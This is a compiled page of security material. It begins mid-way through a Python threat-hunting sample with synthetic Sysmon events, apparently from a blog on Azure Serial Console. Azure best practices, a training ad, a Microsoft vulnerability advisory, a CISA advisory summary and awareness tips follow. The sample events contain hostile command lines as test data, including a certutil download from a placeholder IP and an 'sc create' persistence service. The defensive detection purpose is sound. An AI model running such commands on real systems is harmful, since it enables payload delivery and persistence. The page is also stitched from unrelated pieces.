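                         ParentImage=r"C:\Windows\System32\cmd.exe", LogonId=SAC_LOGON)),
    Event(SYSMON, 1, _ed(ProcessId="4412", Image=r"C:\Windows\System32\sc.exe",
                         CommandLine=r'sc create updsvc binPath= "C:\Temp\upd.exe" start= auto',
                         ParentImage=r"C:\Windows\System32\cmd.exe", LogonId=SAC_LOGON)),
    # A LOLBIN in an RDP session: must NOT be attributed to the serial console.
    Event(SYSMON, 1, _ed(ProcessId="5100", Image=r"C:\Windows\System32\certutil.exe",
                         CommandLine="certutil -urlcache -split -f http://203.0.113.9/a.txt a.txt",
                         ParentImage=r"C:\Windows\System32\cmd.exe", LogonId=RDP_LOGON)),
    Event(SYSMON, 3, _ed(ProcessId="4388", Image=r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                         DestinationIp="203.0.113.7", DestinationPort="443")),
    Event(SYSMON, 3, _ed(ProcessId="5100", Image=r"C:\Windows\System32\certutil.exe",
                         DestinationIp="203.0.113.9", DestinationPort="80")),
]

if __name__ == "__main__":
    for finding in hunt(SAMPLE):
        print(finding)
```

The certutil.exe download and its outbound connection are left out of the findings because that process belongs to the RDP logon, not the sacsess.exe logon; that is the whole point of pivoting on LogonId rather than on process names alone.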

Best Practices: 

The following is a non-exhaustive list of best practices that we recommend for keeping Azure Serial Console secure:

  • Enforce usage of MFA for all the users with “Virtual machine contributor” access.
  • Regularly audit the RBAC permissions of users to ensure that the list of privileged users is up to date.
  • Perform regular monitoring of activity using Azure Serial console by leveraging Azure Activity and Host based logs.

Conclusion 

While Azure Serial Console is a really good feature that allows developers and administrators to troubleshoot during tough times, it can become a security liability if not monitored and locked down. In the next part, we intend to cover Azure Serial console attack and defend when using a Linux flavoured OS.

Microsoft Security Virtual Training Day: Defend Against Threats and Secure Cloud Environments

Grow your skills at Security Virtual Training Day: Defend Against Threats and Secure Cloud Environments from Microsoft Learn. At this free event, you’ll learn to perform advanced hunting, detections, and investigations, and remediate security alerts with Microsoft Defender and Microsoft Sentinel. Using automated extended detection and response (XDR) in Microsoft Defender and unified cloud-native security information and event management (SIEM) through Microsoft Sentinel, you’ll learn to confidently perform investigations and remediations to help defend against threats. You will have the opportunity to: Learn how to investigate, respond to, and hunt for threats using Microsoft Sentinel, Microsoft Defender for Cloud, and Microsoft 365 Defender. Use Microsoft Defender for Cloud to perform cloud security posture management and to help protect cloud workloads. Understand ways to help protect people and data against cyberthreats with Microsoft technologies. Join us at an upcoming two-part event:
Wednesday, September 13, 2023 | 2:30 PM – 5:15 PM | (GMT-05:00) Eastern Time (US & Canada)
Thursday, September 14, 2023 | 2:30 PM – 4:30 PM | (GMT-05:00) Eastern Time (US & Canada)

Delivery Language: English
Closed Captioning Language(s): English
 

Microsoft mitigates Power Platform Custom Code information disclosure vulnerability by Tenable

Summary 

On 30 March 2023, Tenable informed Microsoft under Coordinated Vulnerability Disclosure (CVD) of a security issue concerning Power Platform Custom Connectors using Custom Code. This feature allows customers to write code for custom connectors. This issue has been fully addressed for all customers and no customer remediation action is required.

Customer Impact 

The vulnerability could lead to unauthorized access to Custom Code functions used for Power Platform custom connectors. The potential impact could be unintended information disclosure if secrets or other sensitive information were embedded in the Custom Code function.  

Our investigation into the report identified anomalous access only by the security researcher that reported the incident, and no other actors. All impacted customers have been notified of this anomalous access by the researcher through the Microsoft 365 Admin Center (MC665159).

Fix Release 

Microsoft issued an initial fix on 7 June 2023 to mitigate this issue for a majority of customers. Investigation into the subsequent report from Tenable on 10 July 2023 revealed that a very small subset of Custom Code in a soft deleted state were still impacted. This soft deleted state exists to enable quick recovery in case of accidental deletion of custom connectors as a resiliency mechanism. Microsoft engineering took steps to ensure and validate complete mitigation for any potentially remaining customers using Custom Code functions. This work was completed on 2 August 2023.  

As part of preparing security fixes, we follow an extensive process involving thorough investigation, update development, and compatibility testing. Developing a security update is a balance between the speed and safety of applying the fix and the quality of the fix. Moving too quickly could cause more customer disruption (in terms of availability) than the risk customers bear from an embargoed security vulnerability. The purpose of an embargo period is to provide time for a quality fix. Not all fixes are equal: some can be completed and safely applied very quickly, others take longer. To protect customers from exploitation of an embargoed vulnerability, we also monitor every reported vulnerability for signs of active exploitation and move swiftly if we see any. As both a service provider and a security company, Microsoft appreciates being part of an ecosystem of organizations focused on protecting customers as the highest priority over all other goals.

Microsoft also appreciates the security community’s research and disclosure of vulnerabilities. Responsible research and mitigation are critical for safeguarding our customers and this comes with a shared responsibility to be factual, understand processes and work together. Any deviation from this process puts customers and our communities at undue security risk. As always, Microsoft’s top priority is to protect and be transparent with our customers and we remain steadfast in our mission.

Customer FAQs 

Q: How do I know if I was affected by this unauthorized information disclosure?

A: Microsoft notified affected customers about this issue via Microsoft 365 Admin Center (MC665159) starting on 4 August 2023. If you did not receive this notification, then no action is required.

Q: How do I know if a notification was sent to my organization?

A: We sent Microsoft 365 Admin Center notifications to affected customers using a Data Privacy tag, which means only users with the Global Administrator role or the Message Center Privacy Reader role can view the notification. These roles are assigned by your organization. You can learn more about these roles and how to assign them in Microsoft's documentation for Microsoft 365 admin roles.

CISA, NSA, FBI, and International Partners Release Joint CSA on Top Routinely Exploited Vulnerabilities of 2022 

The U.S. Cybersecurity and Infrastructure Security Agency (CISA), National Security Agency (NSA), Federal Bureau of Investigation (FBI), and international partners are releasing a joint Cybersecurity Advisory (CSA), 2022 Top Routinely Exploited Vulnerabilities. This advisory provides details on the top Common Vulnerabilities and Exposures (CVEs) routinely exploited by malicious cyber actors in 2022, and the associated Common Weakness Enumeration (CWE) entries, to help organizations better understand the impact exploitation could have on their systems. International partners include: Australian Signals Directorate’s Australian Cyber Security Centre (ACSC), Canadian Centre for Cyber Security (CCCS), New Zealand National Cyber Security Centre (NCSC-NZ), New Zealand Computer Emergency Response Team (CERT-NZ), and the United Kingdom’s National Cyber Security Centre (NCSC-UK).

The authoring agencies urge all organizations to review and implement the recommended mitigations detailed in this advisory. The advisory gives vendors, designers, and developers recommendations for implementing secure-by-design and secure-by-default principles and tactics to reduce the prevalence of vulnerabilities in their software, and gives end-user organizations recommendations to reduce the risk of compromise by malicious cyber actors.

Organizations should share information about incidents and unusual cyber activity with their respective cybersecurity authorities, because incidents that are reported quickly can help stop further attacks.

In the U.S., organizations should inform CISA’s 24/7 Operations Center at [email protected] or (888) 282-0870, or an FBI field office.

Passwords and password managers

Check out Roboform

Software Updates

  • #CybersecurityAwarenessMonth Tip: If you connect it, protect it. Outsmart cyber criminals by regularly updating your software. Learn more: https://staysafeonline.org/resources/software-updates/
  • Any device that connects to the internet is exposed to risk. The best defense is to keep device security software, web browsers, and operating systems up to date. Turn on auto-updates! Learn more: https://staysafeonline.org/resources/software-updates/ #CybersecurityAwarenessMonth
  • All those update alerts from your software are important to install! Not only do they fix things that might be buggy, they also patch security holes. Learn more: https://staysafeonline.org/resources/software-updates/ #CybersecurityAwarenessMonth
  • Pay attention to software update alerts and set your software to auto-update. It’s an easy way to keep things safe. Set it and forget it! Learn more: https://staysafeonline.org/resources/software-updates/ #CybersecurityAwarenessMonth
  • Don’t let vulnerabilities linger! Update, update, update! Keeping your software up to date is crucial for a secure digital life. Enable automatic updates to protect your devices against the latest threats. Learn more: https://staysafeonline.org/resources/software-updates/ #CybersecurityAwarenessMonth
  • Set it and forget it! With automatic software updates, you don’t have to worry about manually checking for updates. Embrace the convenience and let your devices take care of themselves. Stay on top of security and enjoy peace of mind. Learn more: https://staysafeonline.org/resources/software-updates/ #CybersecurityAwarenessMonth
  • Outsmart the cyber threats! Attackers are always looking for vulnerabilities to exploit. Stay a step ahead by enabling automatic software updates. Think of them as an invisible shield that fortifies your devices against emerging risks. Stay safe, stay updated! Learn more: https://staysafeonline.org/resources/software-updates/ #CybersecurityAwarenessMonth
  • The power of timely updates! Automatic software updates work silently to protect your devices. Say goodbye to outdated software and embrace the latest features, enhanced performance, and tightened security. Learn more: https://staysafeonline.org/resources/software-updates/ #CybersecurityAwarenessMonth

Phishing

Multi-factor authentication

1. On accounts with your financial info like banks, or online stores

2. On accounts with personal info, like social media

3. On accounts with info you use for work

TLDR: Use MFA everywhere!

Learn more: https://staysafeonline.org/online-safety-privacy-basics/multi-factor-authentication/ #CybersecurityAwarenessMonth

Adding MFA to an account greatly increases your security. It may include:

  • A code emailed to an account or texted to a phone
  • A biometric identifier like a fingerprint
  • A unique number, or a yes/no prompt, generated by an authenticator app

Learn more: https://staysafeonline.org/online-safety-privacy-basics/multi-factor-authentication/ #CybersecurityAwarenessMonth